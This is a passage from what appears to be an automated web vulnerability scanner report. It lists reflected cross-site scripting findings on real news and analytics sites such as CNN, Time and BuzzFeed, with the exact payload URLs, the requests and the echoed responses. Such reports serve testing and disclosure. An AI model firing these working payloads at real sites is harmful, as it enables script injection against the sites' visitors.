Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:19:24 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H0771085A9E<SCRIPT>ALERT(1)</SCRIPT>9B11C9E93DC" was not recognized.
*/

2.29. http://lingows.appspot.com/bubble/ [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1 was submitted in the request_id parameter. This input was echoed as 508ec<img src=a onerror=alert(1)>615ba25ad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /bubble/?request_id=EEEXFUJYLF508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1&respond_path=LINGO.connect&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:31:51 GMT
Server: Google Frontend
Content-Length: 109

LINGO.connect.respond( {"status": "retry", "key": "EEEXFUJYLF508ec<img src=a onerror=alert(1)>615ba25ad1"} );

2.30. http://lingows.appspot.com/bubble/ [respond_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 7c837<script>alert(1)</script>44b0427890c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bubble/?request_id=EEEXFUJYLF&respond_path=LINGO.connect7c837<script>alert(1)</script>44b0427890c&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:31:54 GMT
Server: Google Frontend
Content-Length: 107

LINGO.connect7c837<script>alert(1)</script>44b0427890c.respond( {"status": "retry", "key": "EEEXFUJYLF"} );

2.31. http://moneyland.time.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneyland.time.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f94c"><script>alert(1)</script>ec15378cf14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f94c\"><script>alert(1)</script>ec15378cf14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9f94c"><script>alert(1)</script>ec15378cf14=1 HTTP/1.1
Host: moneyland.time.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://newsfeed.time.com/2011/10/05/an-overwhelmed-amanda-knox-returns-home%E2%80%94will-seattle-embrace-her/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum_d=1317877200286%26vn%3D1; s_vnum_w=1318136400287%26vn%3D1; s_vnum_m=1320123600288%26vn%3D1; __qca=P0-525632728-1317824426570; s_var_18=xss%20bond%20interest%20faq%20contact; __utma=233735963.597047958.1317825659.1317825659.1317825659.1; __utmb=233735963.1.10.1317825659; __utmc=233735963; __utmz=233735963.1317825659.1.1.utmcsr=app.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/time/mobile-apps/thepage.html; s_cc=true; __qseg=Q_D; rsi_segs=; sinvisit_d=true; sinvisit_w=true; sinvisit_m=true; s_sq=timecom%3D%2526pid%253Dnewsfeed%25257Carticle%25257CAn%252520Overwhelmed%252520Amanda%252520Knox%252520Returns%252520Home%2525u2014Will%252520Seattle%252520Embrace%252526nbsp%25253BHer%25253F%2526pidt%253D1%2526oid%253Dhttp%25253A//moneyland.time.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:41:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://moneyland.time.com/xmlrpc.php
Link: <http://wp.me/xxA6>; rel=shortlink
Content-Length: 119197

<!DOCTYPE html>
<!--[if lt IE 7 ]>
<html dir="ltr" lang="en" class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<![endif]-->
<!--[if IE 7 ]
...[SNIP]...
<a class="pageNum" href="http://moneyland.time.com/page/2/?9f94c\"><script>alert(1)</script>ec15378cf14=1" >
...[SNIP]...

2.32. http://pglb.buzzfed.com/26813/3c003b8f05f4a40792d0446420f9ef23 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /26813/3c003b8f05f4a40792d0446420f9ef23

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5b016<script>alert(1)</script>74d967ff502 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /26813/3c003b8f05f4a40792d0446420f9ef23?callback=BF_PARTNER.gate_response5b016<script>alert(1)</script>74d967ff502&cb=8389 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:34:39 GMT
Date: Wed, 05 Oct 2011 14:34:39 GMT
Connection: close

BF_PARTNER.gate_response5b016<script>alert(1)</script>74d967ff502(1291689062);

2.33. http://pglb.buzzfed.com/26813/570b5c03d148b327600c7b21c4de1c70 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /26813/570b5c03d148b327600c7b21c4de1c70

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f1997<script>alert(1)</script>b478c7f3189 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /26813/570b5c03d148b327600c7b21c4de1c70?callback=BF_PARTNER.gate_responsef1997<script>alert(1)</script>b478c7f3189&cb=7079 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:35:05 GMT
Date: Wed, 05 Oct 2011 14:35:05 GMT
Connection: close

BF_PARTNER.gate_responsef1997<script>alert(1)</script>b478c7f3189(1317754281);

2.34. http://pglb.buzzfed.com/26813/62f6407fe047d99a744b85355711cfdc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /26813/62f6407fe047d99a744b85355711cfdc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f37d4<script>alert(1)</script>a4baf090e45 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /26813/62f6407fe047d99a744b85355711cfdc?callback=BF_PARTNER.gate_responsef37d4<script>alert(1)</script>a4baf090e45&cb=1345 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604744
Expires: Wed, 12 Oct 2011 14:40:42 GMT
Date: Wed, 05 Oct 2011 14:41:38 GMT
Connection: close

BF_PARTNER.gate_responsef37d4<script>alert(1)</script>a4baf090e45(1317805518);

2.35. http://pglb.buzzfed.com/26813/663fb9f3b96e903356d0d2dedf5d432c [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /26813/663fb9f3b96e903356d0d2dedf5d432c

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e355a<script>alert(1)</script>e68bb0f9f19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /26813/663fb9f3b96e903356d0d2dedf5d432c?callback=BF_PARTNER.gate_responsee355a<script>alert(1)</script>e68bb0f9f19&cb=8232 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Wed, 12 Oct 2011 14:35:56 GMT
Date: Wed, 05 Oct 2011 14:35:56 GMT
Connection: close

BF_PARTNER.gate_responsee355a<script>alert(1)</script>e68bb0f9f19(1317819999);

2.36. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.time.com
Path:   /results.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6955'><script>alert(1)</script>00dde427740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&x=0&y=0&f6955'><script>alert(1)</script>00dde427740=1 HTTP/1.1
Host: search.time.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.time.com/time/health/article/0,8599,2096138,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum_d=1317877200286%26vn%3D1; s_vnum_w=1318136400287%26vn%3D1; s_vnum_m=1320123600288%26vn%3D1; __qseg=Q_D; __qca=P0-525632728-1317824426570; rsi_segs=; s_cc=true; sinvisit_d=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:23:21 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=utf-8
Content-Length: 84981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
...[SNIP]...
y),NOT(p_article_ID:thepage-2011_04_27_fed-reserve-to-continue-near-zero-interest-rates),NOT(p_article_ID:2042118concat/time/business/article/0%5C%2C8599%5C%2C2042118%5C%2C00.html))&p=0&Nty=1&cmd=tags&f6955'><script>alert(1)</script>00dde427740=1&No=5&Ntt=xss+bond+interest+faq+contact&N=0&srchCat=Full+Archive'>
...[SNIP]...

2.37. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.time.com
Path:   /results.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb0f"><script>alert(1)</script>57c022970d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&x=0&y=0&dbb0f"><script>alert(1)</script>57c022970d5=1 HTTP/1.1
Host: search.time.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.time.com/time/health/article/0,8599,2096138,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum_d=1317877200286%26vn%3D1; s_vnum_w=1318136400287%26vn%3D1; s_vnum_m=1320123600288%26vn%3D1; __qseg=Q_D; __qca=P0-525632728-1317824426570; rsi_segs=; s_cc=true; sinvisit_d=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:23:20 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=utf-8
Content-Length: 84411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
...[SNIP]...
<input type="hidden" value="?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&dbb0f"><script>alert(1)</script>57c022970d5=1" name="curr_url"/>
...[SNIP]...

2.38. http://searchapp.cnn.com/cnn-search/query.jsp [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://searchapp.cnn.com
Path:   /cnn-search/query.jsp

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload f9eaa<img%20src%3da%20onerror%3dalert(1)>195e54f8b9f was submitted in the query parameter. This input was echoed as f9eaa<img src=a onerror=alert(1)>195e54f8b9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cnn-search/query.jsp?query=xss%20interest%20bond%20mortgagef9eaa<img%20src%3da%20onerror%3dalert(1)>195e54f8b9f&ignore=mixed|article|video&start=1&npp=10|10|20&s=all&type=all&sortBy=date&primaryType=mixed&csiID=csi1 HTTP/1.1
Host: searchapp.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnn.com/search/?query=xss%20interest%20bond%20mortgage&primaryType=mixed&sortBy=date&intl=false
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2054692770-1315760506919; __switchTo5x=1; __unam=7549672-1325970ea9e-3fedb63e-1; __qseg=Q_D; rsi_segs=; __utma=180688117.583590198.1316941602.1316941602.1316941602.1; __utmz=180688117.1316941618.1.1.utmcsr=news.google.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/section; __utmv=180688117.Template-ap-CN-G02-FN-01; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; SelectedEdition=www; rsi_segs_ttn=; s_ppv=37; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.cnn.com%25252FUS%25252F%2526oid%253Dhttp%25253A%25252F%25252Fi.cdn.turner.com%25252Fcnn%25252F.element%25252Fimg%25252F3.0%25252Fsearch%25252Fbtn_search_hp_text.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:41:55 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:01:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 2025


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
var cnnDocDomain = '';
var docDomains = [ 'cnn.com', 'turner.c
...[SNIP]...
<textarea id="jsCode" rows="30" cols="100">

{"criteria":[{"target":"mixed","startAt":1,"maxResults":0,"sortBy":"date","order":"desc","sites":[""],"queries":["xss interest bond mortgagef9eaa<img src=a onerror=alert(1)>195e54f8b9f"]},{"target":"article","startAt":1,"maxResults":0,"sortBy":"date","order":"desc","sites":[""],"queries":["xss interest bond mortgagef9eaa<img src=a onerror=alert(1)>
...[SNIP]...

2.39. http://searchapp.cnn.com/cnn-search/query.jsp [sortBy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://searchapp.cnn.com
Path:   /cnn-search/query.jsp

Issue detail

The value of the sortBy request parameter is copied into the HTML document as plain text between tags. The payload 64c3a<img%20src%3da%20onerror%3dalert(1)>7321e626e1b was submitted in the sortBy parameter. This input was echoed as 64c3a<img src=a onerror=alert(1)>7321e626e1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cnn-search/query.jsp?query=xss%20interest%20bond%20mortgage&ignore=mixed|article|video&start=1&npp=10|10|20&s=all&type=all&sortBy=date64c3a<img%20src%3da%20onerror%3dalert(1)>7321e626e1b&primaryType=mixed&csiID=csi1 HTTP/1.1
Host: searchapp.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnn.com/search/?query=xss%20interest%20bond%20mortgage&primaryType=mixed&sortBy=date&intl=false
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2054692770-1315760506919; __switchTo5x=1; __unam=7549672-1325970ea9e-3fedb63e-1; __qseg=Q_D; rsi_segs=; __utma=180688117.583590198.1316941602.1316941602.1316941602.1; __utmz=180688117.1316941618.1.1.utmcsr=news.google.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/section; __utmv=180688117.Template-ap-CN-G02-FN-01; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; SelectedEdition=www; rsi_segs_ttn=; s_ppv=37; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.cnn.com%25252FUS%25252F%2526oid%253Dhttp%25253A%25252F%25252Fi.cdn.turner.com%25252Fcnn%25252F.element%25252Fimg%25252F3.0%25252Fsearch%25252Fbtn_search_hp_text.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:42:20 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:02:20 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 1987


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
var cnnDocDomain = '';
var docDomains = [ 'cnn.com', 'turner.c
...[SNIP]...
<textarea id="jsCode" rows="30" cols="100">

{"criteria":[{"target":"mixed","startAt":1,"maxResults":0,"sortBy":"date64c3a<img src=a onerror=alert(1)>7321e626e1b","order":"desc","sites":[""],"queries":["xss interest bond mortgage"]},{"target":"article","startAt":1,"maxResults":0,"sortBy":"date64c3a<img src=a onerror=alert(1)>
...[SNIP]...

2.40. http://searchapp.cnn.com/gwebsearch/gwebsearch.jsp [domains parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://searchapp.cnn.com
Path:   /gwebsearch/gwebsearch.jsp

Issue detail

The value of the domains request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5fd9'%3balert(1)//0383e943871 was submitted in the domains parameter. This input was echoed as c5fd9';alert(1)//0383e943871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwebsearch/gwebsearch.jsp?start=1&end=11&text=xss%20interest%20bond%20mortgage&numAds=w6n5&getWeb=false&webClientId=cnn&adPage=1&intl=true&domains=cnn.com|turner.comc5fd9'%3balert(1)//0383e943871&csiID=csi2 HTTP/1.1
Host: searchapp.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnn.com/search/?query=xss%20interest%20bond%20mortgage&primaryType=mixed&sortBy=date&intl=false
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2054692770-1315760506919; __switchTo5x=1; __unam=7549672-1325970ea9e-3fedb63e-1; __qseg=Q_D; rsi_segs=; __utma=180688117.583590198.1316941602.1316941602.1316941602.1; __utmz=180688117.1316941618.1.1.utmcsr=news.google.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/section; __utmv=180688117.Template-ap-CN-G02-FN-01; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; SelectedEdition=www; rsi_segs_ttn=; s_ppv=37; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.cnn.com%25252FUS%25252F%2526oid%253Dhttp%25253A%25252F%25252Fi.cdn.turner.com%25252Fcnn%25252F.element%25252Fimg%25252F3.0%25252Fsearch%25252Fbtn_search_hp_text.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:41:49 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:01:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 7424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


<script type="text/javascript">
var cnnDocDomain = '';
var docDomains = 'cnn.com|turner.comc5fd9';alert(1)//0383e943871'.split('|');
for (var idx = 0; idx < docDomains.length; idx++) {
var d = docDomains[idx];
if (location.hostname.indexOf(d) >
...[SNIP]...

2.41. http://searchapp.cnn.com/gwebsearch/gwebsearch.jsp [text parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://searchapp.cnn.com
Path:   /gwebsearch/gwebsearch.jsp

Issue detail

The value of the text request parameter is copied into the HTML document as plain text between tags. The payload 3469b<img%20src%3da%20onerror%3dalert(1)>8cf45b531c2 was submitted in the text parameter. This input was echoed as 3469b<img src=a onerror=alert(1)>8cf45b531c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /gwebsearch/gwebsearch.jsp?start=1&end=11&text=xss%20interest%20bond%20mortgage3469b<img%20src%3da%20onerror%3dalert(1)>8cf45b531c2&numAds=w6n5&getWeb=false&webClientId=cnn&adPage=1&intl=true&domains=cnn.com|turner.com&csiID=csi2 HTTP/1.1
Host: searchapp.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnn.com/search/?query=xss%20interest%20bond%20mortgage&primaryType=mixed&sortBy=date&intl=false
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2054692770-1315760506919; __switchTo5x=1; __unam=7549672-1325970ea9e-3fedb63e-1; __qseg=Q_D; rsi_segs=; __utma=180688117.583590198.1316941602.1316941602.1316941602.1; __utmz=180688117.1316941618.1.1.utmcsr=news.google.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/section; __utmv=180688117.Template-ap-CN-G02-FN-01; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; SelectedEdition=www; rsi_segs_ttn=; s_ppv=37; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.cnn.com%25252FUS%25252F%2526oid%253Dhttp%25253A%25252F%25252Fi.cdn.turner.com%25252Fcnn%25252F.element%25252Fimg%25252F3.0%25252Fsearch%25252Fbtn_search_hp_text.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:41:39 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=1200
Expires: Wed, 05 Oct 2011 15:01:39 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 7502


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


<script type="text/javascript">
var cnnDocDomain = '';
var docDomains = 'cnn.com|turner.com'.spli
...[SNIP]...
<textarea id="jsCode">

{"criteria":[{"target":"web","startAt":"1","maxResults":"10","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a onerror=alert(1)>8cf45b531c2"]}],"metaResults":{"web":"0"},"results":[[]],"islCriteria":{"target":"isl","startAt":"1","maxResults":"11","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a one
...[SNIP]...

2.42. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68883"-alert(1)-"df45a6c10a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

